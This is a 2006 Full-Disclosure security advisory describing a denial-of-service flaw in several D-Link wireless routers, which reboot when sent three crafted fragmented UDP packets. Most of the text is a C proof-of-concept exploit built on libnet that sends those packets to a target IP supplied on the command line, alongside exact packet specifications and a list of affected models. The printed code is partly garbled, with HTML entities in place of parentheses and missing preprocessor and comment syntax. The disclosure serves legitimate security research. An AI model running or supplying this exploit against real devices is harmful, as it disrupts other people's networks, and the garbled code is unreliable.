[Full-disclosure] [thunkers.net] D-Link Fragmented UDP DoS Vulnerability

2006-02-13T00:00:00
ID SECURITYVULNS:DOC:11397
Type securityvulns
Reporter Securityvulns
Modified 2006-02-13T00:00:00

Description

At the time of discovery the issue affected the latest D-Link firmwares. As D-Link has since released a new firmware, this is no longer the case, so... cheers...


Aaron Portnoy


D-Link Fragmented UDP Denial of Service Vulnerability

Aaron Portnoy, aportnoy () ccs . neu . edu || deft () thunkers . net http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt December 8, 2005

DESCRIPTION

Remote exploitation of a design error flaw in multiple D-Link wireless access points could allow attackers to create a denial of service condition on the affected machine and therefore the wired and wireless network itself.

Code execution is believed to be possible, but considering D-Link has since patched this issue I've dropped the research. This issue was discovered before said patch was released. Similar fragmentation vulns in Dlink products have been released in the past, but as this vulnerability affects the latest firmware (at the time of this writing) I consider this still somewhat legit.

I myself don't know too much about hardware exploitation, so I leave this up to the better suited of you out there.

ANALYSIS

Successful exploitation of the described vulnerability allows remote attackers to reboot the target router. Exploitation will occur given that the attacker send 3 successive fragmented UDP packets with the following specifications:

All packets must have the same Identification Number in the IP Header.

Packet 1: The MORE_FRAGMENTS flag must be set to 1. (value IP_MF) The fragmentation offset equal to 0. The packet's payload size consists of 8 bytes. NULL bytes were tested in the proof of concept.

Packet 2: The MORE_FRAGMENTS flag set to 1. (value 0x2002) The fragmentation offset equal to 16. Payload is 8 bytes long.

Packet 3: The MORE_FRAGMENTS flag set to 0. (value 0x0003) The fragmentation offset equal to 24. Payload is 8 bytes long.

In tests the affected routers would instantly terminate all current connections. The DI-524 would take approximately one minute to then reboot and restore a connections. The DI-624 would take approximately 30 seconds.

MITIGATING FACTORS

This vulnerability has been confirmed to work from at most 4 hops from the intended target. Depending on how routers/switches and other hardware placed between the attacker and the router further fragment or reassembly the packets, the denial of service condition may not be triggered.

DETECTION

The following hardware and firmware versions are confirmed vulnerable:

  • D-Link DI-524 Wireless Router, firmware 3.20 August 18, 2005 (latest firmware at the time of this writing)

  • D-Link DI-624 Wireless Router, unknown firmware

  • D-Link DI-784, unknown firmware

  • REPORTED: US Robotics' USR8054.

The following hardware do not appear to be vulnerable:

  • D-Link DI-614+ Wireless Router

  • D-Link DI-604 Ethernet Broadband Router

CREDIT

Vulnerability discovered by Aaron Portnoy (deft () thunkers ! net) and Keefe Johnson.

EXPLOIT CODE

The following proof of concept code successfully triggers the denial of service condition:

/ * * Aaron Portnoy * * silc.thunkers.net, thunkers * * D-Link Wireless Access Point * Fragmented UDP DoS Proof of Concept * * * gcc -o dlink_dos dlink_dos.c -lnet -Wall * /

include <libnet.h>

define DEVICE "eth0"

define SRC_IP "127.0.0.1"

define DST_IP "127.0.0.1"

define SRC_PRT 200

define DST_PRT 11111

void usage (char *name) { fprintf (stderr, "Usage: %s -s <source ip> -d <destination ip>\ -a <source port> -b <destination port>\n", name);

exit &#40;EXIT_FAILURE&#41;;

}

int gen_packet (char device, char pSRC, char *pDST, u_short sPRT, u_short dPRT, int count) {

libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;

char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;

if &#40;!device&#41;
    device = DEVICE;

l = libnet_init &#40;LIBNET_RAW4, device, errbuf&#41;;

if &#40;!l&#41; {
    fprintf &#40;stderr, &quot;libnet_init&#40;&#41; failed: &#37;s&#92;n&quot;, errbuf&#41;;
    exit &#40;EXIT_FAILURE&#41;;
}

src_ip = pSRC ? libnet_name2addr4 &#40;l, pSRC, LIBNET_RESOLVE&#41; :
    libnet_name2addr4 &#40;l, SRC_IP, LIBNET_RESOLVE&#41;;

dst_ip = pDST ? libnet_name2addr4 &#40;l, pDST, LIBNET_RESOLVE&#41; :
    libnet_name2addr4 &#40;l, DST_IP, LIBNET_RESOLVE&#41;;

src_prt = sPRT ? sPRT : SRC_PRT;

dst_prt = dPRT ? dPRT : DST_PRT;

if &#40;count == 1&#41; {
    payload = &quot;&#92;0&#92;0&#92;0&#92;0&#92;0&#92;0&#92;0&#92;0&quot;;
    payload_s = 8;
}

udp = libnet_build_udp &#40;src_prt,
                        dst_prt,
                        &#40;LIBNET_UDP_H + payload_s&#41; * 2,
                        0, &#40;unsigned char *&#41;payload, payload_s, l, udp&#41;;

if &#40;udp == -1&#41; {
    fprintf &#40;stderr, &quot;Can&#39;t build UDP header: &#37;s&#92;n&quot;, libnet_geterror &#40;l&#41;&#41;;
    exit &#40;EXIT_FAILURE&#41;;
}

switch &#40;count&#41; {

case 1:
    frag = IP_MF;
    break;

case 2:
    frag = 0x2002;
    break;

case 3:
    frag = 0x0003;
    break;
}

ip = libnet_build_ipv4 &#40;20,
                        0,
                        1800,
                        frag,
                        128,
                        IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip&#41;;

if &#40;ip == -1&#41; {
    fprintf &#40;stderr, &quot;Can&#39;t build IP header: &#37;s&#92;n&quot;, libnet_geterror &#40;l&#41;&#41;;
    exit &#40;EXIT_FAILURE&#41;;
}

c = libnet_write &#40;l&#41;;

if &#40;c == -1&#41; {
    fprintf &#40;stderr, &quot;Write error: &#37;s&#92;n&quot;, libnet_geterror &#40;l&#41;&#41;;
    exit &#40;EXIT_FAILURE&#41;;
}

printf &#40;&quot;Wrote UDP packet; check the wire.&#92;n&quot;&#41;;

libnet_destroy &#40;l&#41;;

return &#40;EXIT_SUCCESS&#41;;

}

int main (int argc, char **argv) {

int i;
char *pDST, *pSRC, *device;
u_short dPRT = 0;
u_short sPRT = 0;

pDST = pSRC = device = NULL;

while &#40;&#40;i = getopt &#40;argc, argv, &quot;D:d:s:a:b:h&quot;&#41;&#41; != EOF&#41; {
    switch &#40;i&#41; {
    case &#39;D&#39;:
        device = optarg;
        break;
    case &#39;d&#39;:
        pDST = optarg;
        break;
    case &#39;s&#39;:
        pSRC = optarg;
        break;
    case &#39;a&#39;:
        sPRT = atoi &#40;optarg&#41;;
        break;
    case &#39;b&#39;:
        dPRT = atoi &#40;optarg&#41;;
        break;
    case &#39;h&#39;:
        usage &#40;argv[0]&#41;;
        break;
    }
}

printf &#40;&quot;&#92;n----------------------------------&#92;n&quot;&#41;;
printf &#40;&quot;      -=    D-Link DoS PoC     =-&#92;n&quot;&#41;;
printf &#40;&quot;          Aaron Portnoy&#92;n&quot;&#41;;
printf &#40;&quot;       deft &#40;&#41; thunkers ! net     &#92;n&quot;&#41;;
printf &#40;&quot;   silc.thunkers.net, thunkers&#92;n&quot;&#41;;
printf &#40;&quot;----------------------------------&#92;n&quot;&#41;;


device ? printf &#40;&quot;&#92;nDevice: &#92;t&#37;s&#92;n&quot;, device&#41; :
    printf &#40;&quot;&#92;nDevice: &#92;t&#37;s&#92;n&quot;, DEVICE&#41;;

pSRC ? printf &#40;&quot;SRC IP: &#92;t&#37;s&#92;n&quot;, pSRC&#41; :
    printf &#40;&quot;SRC IP: &#92;t&#37;s&#92;n&quot;, SRC_IP&#41;;

pDST ? printf &#40;&quot;DST IP: &#92;t&#37;s&#92;n&quot;, pDST&#41; :
    printf &#40;&quot;DST IP: &#92;t&#37;s&#92;n&quot;, DST_IP&#41;;

sPRT ? printf &#40;&quot;SPort: &#92;t&#92;t&#37;d&#92;n&quot;, sPRT&#41; :
    printf &#40;&quot;SPort: &#92;t&#92;t&#37;d&#92;n&quot;, SRC_PRT&#41;;

dPRT ? printf &#40;&quot;DPort: &#92;t&#92;t&#37;d&#92;n&#92;n&quot;, dPRT&#41; :
    printf &#40;&quot;DPort: &#92;t&#92;t&#37;d&#92;n&#92;n&quot;, DST_PRT&#41;;

for &#40;i = 1; i &lt;= 3; i++&#41;
    gen_packet &#40;device, pSRC, pDST, sPRT, dPRT, i&#41;;
printf &#40;&quot;&#92;n&quot;&#41;;

return &#40;EXIT_SUCCESS&#41;;

}


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/